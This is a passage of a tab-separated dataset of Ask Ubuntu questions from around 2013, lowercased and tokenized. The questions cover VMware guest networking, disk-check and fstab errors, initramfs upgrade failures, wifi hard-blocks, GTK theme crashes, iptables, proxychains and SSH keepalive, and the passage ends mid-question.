355096	network access from ubuntu 13.04 guest to windows 8 host machine	how can i access my ubuntu 13.04 guest vm from my windows 8 host machine ? the virtualization is done using vmware player 6 network details host : windows 8 ip address - 192.168.200.10 network details guest : ubuntu 13.04 desktop ip address - 192.168.200.150 default gateway - 192.168.200.2 vmware player network settings : network adapter - nat -- > used to share the host 's ip address the other options available for vmware player networking which have not been chosen 1 . bridged -- > connected directly to the physical network 2 . host-only -- > a private network shared with the host 3 . custom -- > specific virtual network 4 . lan segment
355100	serious errors were found while checking the disk drive for /media2	serious errors were found while checking the disk drive for /media2 im getting this error a lot when booting into my minimal ubuntu xbmc install ( ubuntu 13.04 ) if i drop into to the recovery console and try to run fsck on the partition it tells me the partition is already mounted . fsck from util-linux 2.20.1 /dev/sdc3 is mounted . typing in `` mount '' it shows the partition as unmounted /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sdc2 on /media/usbhd-sdc2 type ext4 ( rw , relatime , data=ordered ) /dev/sdb1 on /media type ext4 ( rw ) trying umount /dev/sdc3 tells me the partition is n't mounted it appears the partition has mounted in /media/usbhd-sdc3 not sure why ? i can successfully umount the partition from /media/usbhd-sdc3 and then run fsck on it and it pulls up no errors does anybody have any ideas on this one ... ..it 's got me kinda stuck . here 's the boot.log from the recovery console.. xbmc @ xbmc : ~ $ cat boot.log fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 /dev/sdc3 is in use . e2fsck : can not continue , aborting . mountall : fsck /media2 [ 326 ] terminated with status 8 mountall : unrecoverable fsck error : /media2 new_volume : clean , 102414/3915216 files , 1831174/15630336 blocks lircd-0.9.0 [ 776 ] : lircd ( default ) ready , using /var/run/lirc/lircd wdred : clean , 9506/183148544 files , 573458628/732566272 blocks ignoring errors with /media2 at user request /etc/rcs.d/s37apparmor : 35 : . : ca n't open /lib/apparmor/functions loading the saved-state of the serial devices ... * setting sensors limits * starting netbios name server [ ok ] [ ok ] * loading lirc modules [ ok ] * stopping system v initialisation compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting [ ok ] * starting [ ok ] * starting acpi daemon [ ok ] * starting [ ok ] * starting [ ok ] * starting save kernel messages [ ok ] * starting [ ok ] * starting regular background program processing daemon [ ok ] * starting cpu interrupts balancing daemon [ ok ] * starting remote control daemon ( s ) : lirc [ ok ] * stopping save kernel messages [ ok ] starting sick beard starting xbmc * starting sabnzbd+ binary newsgrabber [ ok ] * checking battery state ... [ ok ] * stopping system v runlevel compatibility [ ok ] * starting [ ok ] and here 's the one after exiting and booting up successfully.. xbmc @ xbmc : ~ $ cat /var/log/boot.log fsck from util-linux 2.20.1 /dev/sdc3 : clean , 18703/119349248 files , 287562124/477377851 blocks swapon : /dev/disk/by-uuid/ac801b6f-ed4a-4f21-bf86-40e8ce8ed2c2 : swapon failed : device or resource busy mountall : swapon /dev/disk/by-uuid/ac801b6f-ed4a-4f21-bf86-40e8ce8ed2c2 [ 943 ] terminated with status 255 mountall : problem activating swap : /dev/disk/by-uuid/ac801b6f-ed4a-4f21-bf86-40e8ce8ed2c2 /etc/rcs.d/s37apparmor : 35 : . : ca n't open /lib/apparmor/functions loading the saved-state of the serial devices ... * starting system logging daemon [ ok ] * setting sensors limits [ ok ] * stopping system v initialisation compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting [ ok ] * starting [ ok ] * starting regular background program processing daemon [ ok ] * starting acpi daemon [ ok ] * starting [ ok ] * starting [ ok ] * starting save kernel messages [ ok ] * starting [ ok ] * starting cpu interrupts balancing daemon [ ok ] * loading lirc modules [ ok ] * stopping save kernel messages [ ok ] * starting remote control daemon ( s ) : lirc [ ok ] starting sick beard starting xbmc * starting sabnzbd+ binary newsgrabber [ ok ] * checking battery state ... [ ok ] * stopping system v runlevel compatibility [ ok ] * starting [ ok ] it seems the swap partition failed to mount ... ..i believe it 's because it was mounted in /media/usbhd-sdc2 i have no idea where there 's mount points have come from.. ! ! ! it seems all my mechanical hdds partitions have been listed in the /media xbmc @ xbmc : /media $ ls usbhd-sdc1 usbhd-sdc2 usbhd-sdc3 wdred here 's my fstab.. xbmc @ xbmc : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=f7767ada-f636-4983-9888-9491484ec5c4 / ext4 errors=remount-ro 0 1 # /media was on /dev/sdb1 during installation uuid=b52ed08d-2eca-425f-ac80-3fcfd781b0f8 /media ext4 defaults 0 2 # /media2 was on /dev/sdc3 during installation uuid=34dc11ad-bf6d-4874-8ae6-6aaa5eade523 /media2 ext4 defaults 0 2 # swap was on /dev/sdc1 during installation uuid=ac801b6f-ed4a-4f21-bf86-40e8ce8ed2c2 none swap sw 0 0 any help or suggestions would be greatly appreciated ...
355110	lenovo x131e chromebook ubuntu installation	has anyone been able to successfully install ubuntu on a lenovo x131e chromebook ? i 'm able to run the scripts and install it but after it completes the install i can not get ubuntu to start , it just starts in chrome . it partitions the ssd for sure because i can see it in the chrome os . any ideas on how to get it to start or a proper way to install ?
355118	native compile ubuntu-12.04 on powerpc-64bit	i have a freescale t4240qds powerpc-64bit board and i have ported embedded linux on the board provided from freescale . now i need to download the ubuntu source on the freescale t4240qds powerpc and do a native compilation for t4240qds processor . is this possible ? finally i want to run ubuntu-12.04 on t4240qds powerpc-64bit .
355119	what version of ubuntu is right for my computer ?	i want to change operating systems from windows xp to ubuntu . system info • microsoft windows xp professional 2002 service pack 3 • pentium 4 cpu 2.80ghz • 5gb ram what is the best version of ubuntu to install on my computer ?
355121	updater is not upgrading	i am using ubuntu 12.10 . i tried to upgrade it using the software updater , but it is not working even after pressing upgrade button . then i tried to upgrade through the terminal using the command sudo apt-get upgrade . i got the following error message : sudo : unable to change to sudoers gid : operation not permitted . please help .
355133	brightness stuck at 100 % on an acer aspire 5742z	i had done a ton of reading on problems similar to this and have done some digging in my sys/class files to find my brightness controls . i found two possibles , one from acer and one from intel , both with varying results . in each folder , there were a few files , three in particular being brightness , max_brightness , and actual_brightness . in the acer backlight folder , all values read 15 , but the value for brightness would change if i changed the brightness inside ubuntu . so ubuntu is trying to change the acer brightness instead of the intel brightness , which is next on our stop . all values for the same three files read 976 , and i could not change them no matter what . is there anyway to set ubuntu to alter brightness for this backlight , instead of acer 's backlight ?
355161	why does usblp prevent vmware from accessing my usb printer ?	every time i plug in my usb printer for vmware workstation 9 to use ( windows 7 guest os ) , ubuntu 13.04 ( the host ) launches usblp and grabs the printer . vmware then throws up a dialog : the specified device is claimed by another driver ( usblp ) on the host operating system . as a result , i ca n't use the printer in vmware . i 'd like to stop ubuntu 's usblp from doing this . ( i never want the printer used on the linux host , just in the windows guest . ) googling this question produces only answers that are 5+ years old and do n't work , like running modprobe -r usblp , which does n't stop usblp from being invoked , or editing /etc/hotplug/blacklist , when /etc/hotplug does n't seem to exist for ubuntu 13.04 . the guest os does have focus when i connect the printer , so that 's not the problem . i also looked in vmware workstation 's `` vm / removable devices '' menu but did n't see anything obvious to affect the problem . does anyone have a modern way to suppress or disable usblp that works for ubuntu 13.04 ? thank you very much .
355163	wubi install fail because of `` substring not found ''	every time i try to install wubi , i get a missing substring last parts of the install log always state the same thing `` substring not found '' . thoughts ? last part of wubi-12.04.3-rev279 : 10-07 20:52 debug windowsbackend : total size=30000 root=29744 swap=256 home=0 usr=0 10-07 20:52 debug tasklist : # # finished choose_disk_sizes 10-07 20:52 debug tasklist : # # running expand_diskimage ... 10-07 20:53 debug tasklist : # # finished expand_diskimage 10-07 20:53 debug tasklist : # # running create_swap_diskimage ... 10-07 20:53 debug tasklist : # # finished create_swap_diskimage 10-07 20:53 debug tasklist : # # running modify_bootloader ... 10-07 20:53 debug tasklist : new task modify_bcd 10-07 20:53 debug tasklist : # # # running modify_bcd ... 10-07 20:53 debug windowsbackend : modify_bcd drive ( c : hd 785689.058594 mb free ntfs ) 10-07 20:53 error tasklist : substring not found traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 695 , in modify_bcd valueerror : substring not found 10-07 20:53 debug tasklist : # cancelling tasklist 10-07 20:53 debug tasklist : new task modify_bcd 10-07 20:53 error root : substring not found traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 695 , in modify_bcd valueerror : substring not found 10-07 20:53 debug tasklist : new task modify_bcd 10-07 20:53 debug tasklist : # # finished modify_bootloader 10-07 20:53 debug tasklist : # finished tasklist
355166	how to setup custom user write permissions	i 've searched ask ubuntu 's stack , referenced the documentation for filepermissions and reviewed the user management documentation on how i can create custom user settings that would write only new files/folders users add through vpn , everything in the group can be read and only a select users added to apart of a different group can delete the files ( basically i will give them full access ) . example : 13-10-10_foo_bar can be added to the server , copied from the server to a desktop , but it can not be written over , modified , or deleted at anytime after it is added . only certain user groups can remove the file . is it possible to setup custom user settings for write in certain user groups ?
355168	developing for ubuntu tablet using python	i want to start developing for the ubuntu tablet , but i do n't think that i can use python with the sdk . i heard that you can make games with python in blender and i wanted to know if there was a quick and easy way to port games from blender onto the ubuntu phone platform and how to do it . if there is n't , are there other ways to make games using python for the ubuntu tablet ?
355169	how do i root my galaxy note ii n7102 using ubuntu 13.04	i am new to ubuntu and do n't know my way around the os . i do n't know the technical terms you guys use , but i would really like to root my galaxy note ii n7102 chinese version cell phone using ubuntu 13.04 . can someone , please ? help me in the most laymen terms for ubuntu as possible .
355171	how to a download a part of webiste to access it offline on your computer	sir i want to download a education website . to read it how can i download full website in ubuntu
355173	initramfs fail after upgrade to 13.04 , cant update system with apt-get / dpkg	the other night i received the prompt suggesting for me to upgrade from 12.10 to 13.04 . i figured why not , and accepted the upgrade . i had very little interaction , just clicked the accept button , and came back to an upgraded machine in an hour or so . initramfs now fails on old linux headers which i do not believe exist on my system , and i am unable to update anything on my system which depends on it ( which is , pretty much everything , including graphics drivers , system updates , etc ) . i have been trying to resolve this issue for nearly a month now , and have learned quite a lot about ubuntu/linux in the process , though i am still not sure what i have to do to get past the following error . whenever i run commands such as : sudo apt-get install ( with -f or not ) sudo apt-get upgrade sudo apt-get dist-upgrade sudo apt-get remove sudo apt-get autoremove sudo update-initramfs -u i will receive the following messages / errors and will not be able to continue the process : setting up initramfs-tools ( 0.103ubuntu0.7 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-31-generic fatal : open /boot/vmlinuz-3.5.0-21-generic : no such file or directory run-parts : /etc/initramfs/post-update.d//runlilo exited with return code 1 dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) both 'sudo apt-get clean ' and 'sudo apt-get autoclean ' seem to have no effect . using 'sudo apt-get update ' appears to run as expected , but no change as far as receiving the above error with subsequent commands . running 'sudo dpkg-reconfigure -a ' did not make a difference . ive learned that there may be remnants of '3.5.0-21-generic ' on my system . ive done my best at locating them and moving them to a tmp dir in my home . ive examined my /etc/apt/sources.list for any references to those headers , and there arent any . ive examined the contents of '/var/lib/dpkg/info/linux-image-generic.list ' which is as follows : / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-image-generic /usr/share/doc/linux-image-generic/copyright /usr/share/doc/linux-image-generic/changelog.gz ive checked the contents of all of those locations , and found no references to anything with `` 3.5.0-21 '' , and in fact searching my entire system , the only files with that string in the name now exist in my new tmp dir that i moved everything into . ive also moved the references to linux-image-3.5.0-21-generic . * and linux-image-extra-3.5.0-22-generic . * that were in '/var/lib/dpkg/info ' into my new tmp dir . it seems to me that there isnt any place where vmlinuz-3.5.0-21-generic can be on my system . i cant find any when searching all files for anything containing '3.5.0-21 ' . i still cant use initramfs , which implies that i cant update/upgrade my system , install new packages , or fix a few other issues that sprung up when i upgraded to 13.04 . what follows is ( some of ) my output from : sudo update-initramfs -u -v available versions : 3.8.0-31-generic 3.5.0-41-generic keeping /boot/initrd.img-3.8.0-31-generic.dpkg-bak update-initramfs : generating /boot/initrd.img-3.8.0-31-generic adding module /lib/modules/3.8.0-31-generic/kernel/drivers/hid/hid.ko ... ( mostly adding/calling happening here , hundreds of lines of output , seems successful ) calling hook busybox adding binary /usr/lib/initramfs-tools/bin/busybox calling hook dmsetup adding binary /sbin/dmsetup adding library /lib/i386-linux-gnu/libdevmapper.so.1.02.1 rm -f ./etc/ld.so.conf.d/nvidia_settings.conf rm -f ./lib/firmware/cxgb4/t4fw.bin building cpio /boot/initrd.img-3.8.0-31-generic.new initramfs fatal : open /boot/vmlinuz-3.5.0-21-generic : no such file or directory run-parts : /etc/initramfs/post-update.d//runlilo exited with return code 1 could anyone please help me understand this problem , and how i can alleviate it ? what can i do to get past this ? i really dont want to resort to completely reinstalling my system , is there any other way to fix this ?
355176	ca n't connect to internet , just installed ubuntu	i just installed ubuntu on dell mini that i had laying around , and the install went perfectly fine except for the fact that i can not connect to my wireless internet . when i click the network button in the top bar it does n't display any networks to connect to . all it show is : ethernet network and disconnected ( both grayed out ) vpn connections , enable networking ( enabled ) , connection information ( grayed out ) edit connections i 've tried to fix it but i ca n't seem to figure out what is wrong . i might be missing something obvious because i 'm new to linux . if anyone could help that would be great . thanks . edit : i am running a dell mini with these specs : processor : intel atom cpu n450 @ 1.66ghz x 2 graphics : intel igd os-type : 64-bit with ubuntu version : 13.04
355177	what is the correct way to install adwaita theme on ubuntu 12.04 ?	i want to have adwaita theme on ubuntu 12.04 . on my previous installation i had it in unity right after installing gnome3 shell . gtk2 apps did n't have tabs like what it would be expected on gtk3 and they were ugly . for example gedit had adwaita tabs , but firefox settings page did n't . now , i have a new installation of ubuntu 12.04 , and i want to have adwaita theme . what is the correct way to install adwaita theme so that those problems wo n't occur ? thanks in advance
355178	close cat command after writing file	i am currently trying to read a device that is connected to computer using usb port . here is my code : stty -f /dev/ttyusb0 9600 cs8 & & cat -v < /dev/ttyusb0 > /path/to/folder/file.txt , which works like a charm till see the output . the only thing that makes it not perfect enough is the fact that after the output written to a file , the command is still listening the port ( not auto close ) , so i 've to press ctrl+c manually . so , what i should do , to auto close the command ( like give it an auto-pressing ctrl+c ) ? thank you very much .
355180	how to create a custom launcher in cairo dock ?	i 'm trying to create a custom launcher for aptana studio in my cairo dock . i begun by right click → add custom launcher and i 'm stuck at entering the command ? what am i supossed to put in there ( i tried ./aptanastudio3 - but it does n't work ) . i 'm using ubuntu 12.04 . i have already created an aptana studio 3.desktop file and it has an icon ; my only problem is i can not put it into my cairo dock . how do i create a custom launcher in cairo dock for aptanan studio ?
355181	ubuntugnome uses other nautilus , how do i make it split the window into two using f3	i 'm used to splitting windows usind f3 in ubuntu , but in ubuntu gnome it does't work . how do i fix that ? thanks !
355182	vpn connection shortcut for different usersnames and passwords ?	can anyone tell me how to create a vpn connection in my desktop that requires both username and password each time ... cuz im going to install ubuntu 10.04 on an old computer with more than 200 users ... exactly sth like pbk on windows ... thanks in advance
355183	after tweaking ubuntu 12.04 , desktop only shows default gtk-theme	i just installed ubuntu 12.04 amd64 on my laptop but when i use some applications i get ugly looking menus and buttons , windows 95 like . if i try to change the theme from the appearance settings it does n't work . here are some pictures of what i 'm talking about i tried a few things i saw online but they have n't done the trick . i 'm kind of wondering how i can get a more modern menu and toolbar , the more default ubuntu looking one . edit ran `` gnome-settings-daemon '' and got errors . here is what it said . === xinerama setup configuration === clone : false output : laptop attached to lvds-0 status : on width : 1366 height : 768 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 === applying configuration configuration === clone : false output : laptop attached to lvds-0 status : on width : 1366 height : 768 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 ( gnome-settings-daemon:3649 ) : gdk-warning ** : the program 'gnome-settings-daemon ' received an x window system error . this probably reflects a bug in the program . the error was 'badmatch ( invalid parameter attributes ) ' . ( details : serial 263 error_code 8 request_code 140 minor_code 30 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . )
355188	date format in unix	how can i show date in yyyy-mm-ddthh : mm : ss+zzzz format in linux ? i need to write the creation date of a file say file1 in another file say file2 in given format . help me to achieve this .
355189	i want to put a video as a desktop background how to do it ?	i want to put cool videos as background on my ubuntu desktop so i wondered that if there is an app or program that can do this , and how i do this , thanks
355190	media content on seperate hard drive	i would like to ut media content on seperate internal hard drive , but will like to access it from the video , music and pics options on desktop where it is usually accessed . how do i change the folders properties to the new hard drive ?
355194	why have gvfs mount points in 13.10 changed to the user id rather than the user name as in 13.04	when mounting a samba share in files ( nautilus ) in 13.10 i 've noticed that the mount point is now /run/user/1000/gvfs/ { name of share } . under 13.04 the same nautilus share used to mount under /run/user/rod/gvfs/ { name of share } . what was the reason for the change and can it be changed back to using your real name ?
355195	how to dual-boot windows xp and ubuntu ( 2 hard drives ) ?	i 'm sorry for being such a noob but i 'm totally clueless when it comes to linux and its distributions . i 'm also not very used to command-lines but i thought maybe i could use ubuntu and learn more about it . i have two hard drives , one has windows xp and the other is empty . i want to install ubuntu on the empty drive without erasing anything from the other one . is there a way ? i do n't know about grub too so can you guys help me ? honestly , i think i 'm not intelligent enough to use ubuntu but i guess i should just try : d btw , i 'm going to install it using a usb stick . i need to make it bootable first , right ? how do i do that ? sorry ... i 'm usually pretty good with windows but not linux since it 's my first time ...
355199	in iptables is it possible to restrict by gateway ?	using iptables it is possible to add a drop action for some particular source ip and/or destination ip . i want to know if it is possible to drop a packet based on ( default ) gateway used ? the iptables will be present on the gateway itself and the drop rules will be added to the forward chain .
355203	gtk x error leads to ugly theme	my gtk theme is pretty ugly for ubuntu 12.04 that i just installed after some research online i realized that there must be a problem with the gtk them so when i ran gnome-settings-daemon i go this error . gnome-settings-daemon === xinerama setup configuration === clone : false output : laptop attached to lvds-0 status : on width : 1366 height : 768 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 === applying configuration configuration === clone : false output : laptop attached to lvds-0 status : on width : 1366 height : 768 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 ( gnome-settings-daemon:5075 ) : gdk-warning ** : the program 'gnome-settings-daemon ' received an x window system error . this probably reflects a bug in the program . the error was 'badmatch ( invalid parameter attributes ) ' . ( details : serial 263 error_code 8 request_code 140 minor_code 30 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i have no idea what it means .
355205	how to set up wired pppoe broadband internet in ubuntu 12.04 live cd mode ?	i am trying to set up a wired pppoe broadband internet in ubuntu 12.04 live cd mode . i have followed both the methods - setting it up from network manager and setting it up by sudo pppoeconf as it has been told in how to set up a broadband connection . but none of them did work . please advise .
355210	wifi gets hardware-disabled after waking from sleep	i have an hp 14-b015dx device . whenever i wake my device from sleep the wifi stops working . rfkill shows it is hard bock . even the wifi light goes orange showing the wifi is disabled by hardware . and i ca n't switch it on again . ( hardware-switch does n't work ) . the only way to get the wifi to work again , is to reboot the device lspci | grep -i wireless shows : `01:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) ` any help is appreciated ! ~thanks
355217	change wireless paramaters in ubuntu	my laptop has windows 8 and i have a intel centrino n 2230 wireless adapter . i had issues with connecting to internet over wi-fi and in order to fix this , i changed the wi-fi adapter property to 802.11n channel width for band 2.4 from then on , there have been no problems.now , i have installed ubunty 13.04 as a dual os and wi-fi just does not work.i suspect this is because of the ubuntu not taking the right adapter property.my iwconfig details are as follows : $ iwconfig eth0 no wireless extensions lo no wireless extensions wlan0 ieee 802.11bgn essid : '' netgear '' mode : managed freequency:2.43t ghz any idea how i can change that ieee value to make this work ?
355218	support for geological software applications in ubuntu	we are from petroleum industry , and we are using geological software applications like : paradigm ihs kingdom petrel software we do also use .sgy files in connection with our job . all of this software is working perfectly fine in linux , but will it work with ubuntu ? if it works , we would like to know the package names which have to be installed in ubuntu , and then we will test it . are there any ubuntu representatives or other people who can help us with this matter in india ?
355219	mutt leaves lots of empty lines on terminal after it quits	any idea why it does this ? there 's bunch of empty lines between my prompt every time i quit the app . is there fix or workaround for this ?
355220	getting rvm insallted rails to launch	so i got my rails installed with rvm on this laptop and now when i open up terminal , i am still not able to use the application when typing rails new new_app in terminal for instance . now , when i launch up my aptana studios , it understand where rvm installed the rails application immedietly and is able to use rails command . my question therefor is - how can i configure it so , that i can use rails commands simply from terminal aslo ?
355221	starting dropbox on its own without any user intervention	i am trying to use dropbox on ubuntu 12.04 . it is having many problems : dropbox is not automatically starting on its own . at start , when i login into the user , it asks me , dropbox needs root access so asks for admin password . i need to manually start dropbox daemon using command : ~/.dropbox-dist/dropboxd . does any solution exist so that dropbox will start on its own without needing to enter anything or starting anything .
355223	limit the parallelisation of upstart ?	if i understand right , upstart runs all tasks that are ready to run in parallel . however , is there a way to limit the amount of parallelisation ? that is , the number of parallel tasks that are run should be capped by some constant . for example , make allows you to run all tasks in parallel with the -j option . if you want to restrict the amount of parallel jobs , you can pass a number to it . thus , -j 2 means run jobs in parallel but not more than two at a time . i am looking for the equivalent setting in upstart . edit i just realized that my question is silly . if the jobs are daemons that never stop , then there is no way for upstart to decide that they are done . instead , what i need is a way to limit by disk i/o . that is , when disk i/o is high , upstart should n't spawn new jobs . it should only spawn after disk activity cools down .
355225	fix for `` wireless disabled by hardware key '' in dual boot system win8.1/ubuntu 13.04	i have a dual boot system with windows 8.1 and ubuntu 13.04 i upgraded from windows 7 and since then i have been unable to browse via wireless on ubuntu i have tried all the tips i can find but none seem to work . kindly assist . machine is a hp pavilion dm4-2070us wireless is intel centrino-1000
355230	installing flash player	i have downloaded adobe flash player 11.2 , but ca n't install it . i am using ubuntu 13.04 can anyone help me ? i do n't know which program it will open with .
355236	no such partition . grub rescue >	i had 2 versions of ubuntu installed in single system . 12.04 and 13.04 on separate partitions . i wanted to delete partition containing 12.04 . i used 'disc ' software to do the job . whether i successfully deleted it i do n't know . meanwhile i deleted partition named 'swap ' . while rebooting , i 'm getting 'no such partition grub rescue > . thank you .
355244	ubuntu 10.04 . high cpu usage right after wake up	i 've been using 10.04 in my vaio laptop for more than 3 years now without any problems , until recently . after updating ( a few months now ) my computer behaves not so well . the problem : if i suspend de machine , when trying to wake it up , the computer would start using a lot of cpu for about a minute before showing the login dialogue again . if i try to suspend again , it would do the same before powering down . this drains my battery and it should n't happen since as i said , it never happened before . moreover , after a fresh install it works with the latest nvidia drivers , but , if i update the distribution ( kernel , etc ) the problem appears . it did n't happened before , my nvidia card is a geforce 310m , using nvidia drivers since the ones provided by ubuntu never worked for me , and i tried many times . i 'm not a fan of using their drivers but i always had problems when installing the restricted drivers from ubuntu . i 'll appreciate any ideas and i 'll provide with all the info you might suggest . i tried this already why does cpu usage spikes to 90 % and more after wake from suspend on ubuntu 13.04 ? best regards , sebastian
355250	rhythmbox problem uploading songs to ipod touch	i run ubuntu 12.04 ( lts ) , all up-to-date , and i notice a strange behaviour when i connect my ipod touch ( 2nd generation ) . only a few times rhythmbox is able to upload or delete songs from the idevice , generally i have to log-out/log-in to enable this operation , and sometimes still is not enough . have you ever noticed this kind of problem ? best
355251	how to remove apache2 ?	well i installed apache2 by typing sudo apt-get install apache2 now i am tring to uninstall apache2 by this command sudo apt-get autoremove apache2 well my apache2 is still running . and when i stop it vie typing sudo service apache2 stop it stops , and i can also start it typing sudo service apache2 start whats the point of auto remove anyway ? and how to remove apache2 ?
355257	i want to know if ubuntu will work better than windows xp on my dell inspiron 1300	i have an upgraded dell inspiron 1300 from 7 years ago that my parents gave to my as my birthday present . it currently features 2 gb of ram memory and 160 bg of hard core memory . it has a mobile intel 910 gml express chipset family video card and a intel celeron processor at 1.60 ghz . i would just love to know if by installing ubuntu on my computer i will be able to have a better performance while watching videos and streaming stuff on line .
355259	page number display when scrolling	i have a question about scrolling in libreoffice writer . when i scroll up or down a document , as soon as i turn the mousewheel , a black rectangle reading `` page 1/4 '' shows up , on the right side of the document . it stays visible until the cursor is brought on it ( then it disappears ) , or the mousewheel is scrolled again ( then it is replaced by another rectangle ) . i would like to know how to avoid this indicator to show . if you have any clue , i would be grateful . thanks !
355261	ubuntu 13.04 intallation guide	i am new to ubuntu operating system . i installed ubuntu 12.04.3 through wubi but it did'nt work perfectly it could not get wifi access while it was present and was working on windows 7 . 2nd it could'nt displayed my 100gb partition like computer has not such partition so i decided to install 13.04 i downloaded the 32 bit version , created bootable usb , after the main settings it took me to the screen where i had to decide the action . but it said `` replace windows 8 '' and `` something else '' first i have windows 7 not windows 8 . 2nd after watching different tutorials i selected `` something else '' from the menu while i shrinked my 'c ' drive and got 32gb space for ubuntu that i kept unallocated . that unallocated portion was shown with other partitions that while 'c ' was separate only 2gb was free . please first clear me this concept and the main thing is i want to install ubuntu on a separate drive besides 'c ' such that if i ever encounter windows 7 problems and need to install a fresh copy of windows already installed ubuntu should not b effected of this formatted 'c ' drive . totally ubuntu should have its own drive . thanks in advance
355264	/bin/proxychains : line 9 : exec : [ url ] : not found	i 'm setting up /etc/proxychains.conf . when i use proxyresolv it 's okay : proxyresolv myipaddress.com |r-chain|- < > -*********:443- < > < > -4.2.2.2:53- < > < > -ok 64.99.64.37 but proxychains does n't work : proxychains myipaddress.com proxychains-3.1 ( http : //proxychains.sf.net ) /bin/proxychains : line 9 : exec : myipaddress.com : not found what can i do ?
355265	how to keep ssh running without connection drop on ubuntu 12.04	i use a raspberry pi ssh to my ubuntu web server to manually run an application that would not work with keeping it run with upstart or other daemon tools . however , within hours the connection would drop and i have to restart it manually . this is a hassle because i can not always stay just to monitor the connection . i use the method from this link and it can not help me : http : //ubuntu.wordpress.com/2006/02/03/keeping-ssh-sessions-alive/ provided that i change serveraliveinterval 5 to serveraliveinterval 3600 thank you ,
355269	ubuntu 12.04 - gnome-settings-daemon crash and problem with fn keys	i know there are many questions similar to this , i 've been reading them and searching for a solution for 2 days but no luck so far . i have a samsung np550p5c laptop and just installed ubuntu 12.04.3 on it . when i first installed there was nothing wrong , all the function keys , like brightness and volume adjustment , were working perfectly fine . then i ran the updates including the kernel update . and suddenly my fn keys stopped working , even before i rebooted . i spent a couple of hours trying to solve it but it did n't work . so i did a fresh install again . i read somewhere that it could be the kernel update that causing it , so this time i did n't do the kernel update . it was ok this time until i rebooted after the updates , but after the reboot they again stopped working . only the touch pad enable/disable and screenshot keys are working now . i tried installing samsung-tools , samsung-laptop , nothing changed . also when i go in to system settings- > keyboard- > shortcuts and edit a shortcut , actually it recognizes the key , for example when i hit fn + f8 it shows as `` audio raise volume '' . plus , when this problem with the function keys occurs , there 's always a slight change in the graphics , like in firefox and vlc player the buttons are more edgy than before . it looks like something messed with the themes or something . thanks in advance edit : when i run gnome-settings-daemon it returns the output below and crashes . === xinerama setup configuration === clone : false output : laptop attached to lvds-0 status : on width : 1600 height : 900 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 === applying configuration configuration === clone : false output : laptop attached to lvds-0 status : on width : 1600 height : 900 rate : 60 primary : true position : 0 0 output : ( null ) attached to vga-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to hdmi-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 output : ( null ) attached to 